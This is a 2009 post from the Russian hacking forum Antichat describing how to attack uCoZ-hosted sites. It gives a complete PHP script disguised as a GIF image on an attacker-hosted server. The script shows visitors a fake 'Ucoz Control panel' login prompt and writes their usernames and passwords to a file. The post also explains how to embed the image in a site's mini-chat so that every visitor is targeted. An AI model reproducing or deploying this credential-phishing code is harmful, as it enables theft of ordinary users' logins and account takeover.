HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Найден способ взлома UcoZ!
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #25  
Старый 15.02.2009, 17:32
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
С нами: 9655526

Репутация: 1334
По умолчанию
to NooB MC

Есть такой способ:

Нужно зарегистрировать хост с поддержкой php (например, http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например: passwords.txt (сюда будут присылаться пассы пользователей сайта), и на файл smile.gif. Далее качаем любой смайлик в расширении .gif (типа cool.gif). Потом в блокноте пишем:

Код:
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
 $login = $_SERVER['PHP_AUTH_USER'];
 $pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
 {
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
 }
 elseif($login)
 {
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
 }
}
imagegif($image);
imagedestroy($image);
?>
После этого сохраняем файл под названием smile, потом меняем расширение на gif.
Теперь выбираем юкозовский сайт, например http://mysite.ucoz.ru/ потом в мини чате пишем логин, а в содержании сообщения:

[I*MG]http://mysite.phphost.net/smile.gif[/I*MG]

Если после этого в мини чате вместо сообщения появился смайлик - значит сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, будет появляться форма, в которую нужно будет ввести логин и пароль.

Ps: Но этот баг, наверное, уже прикрыли...
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Социнженерия-как способ легкого взлома :X\SocinG\ Уязвимости Mail-сервис 13 10.11.2006 05:13
Подскажите новый способ взлома !!!! Orel Molodoi Болталка 3 20.04.2006 13:27
Новый способ взлома мыла Mertvii-Listopad Уязвимости Mail-сервис 12 21.03.2006 02:02
естЬ лИ ЭффеКтивНЫЙ спосОБ ВзлоМА mail.ru UnKn0wN Уязвимости Mail-сервис 6 03.03.2006 00:07
Простейший способ взлома мыла charlie Уязвимости Mail-сервис 36 22.06.2005 13:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.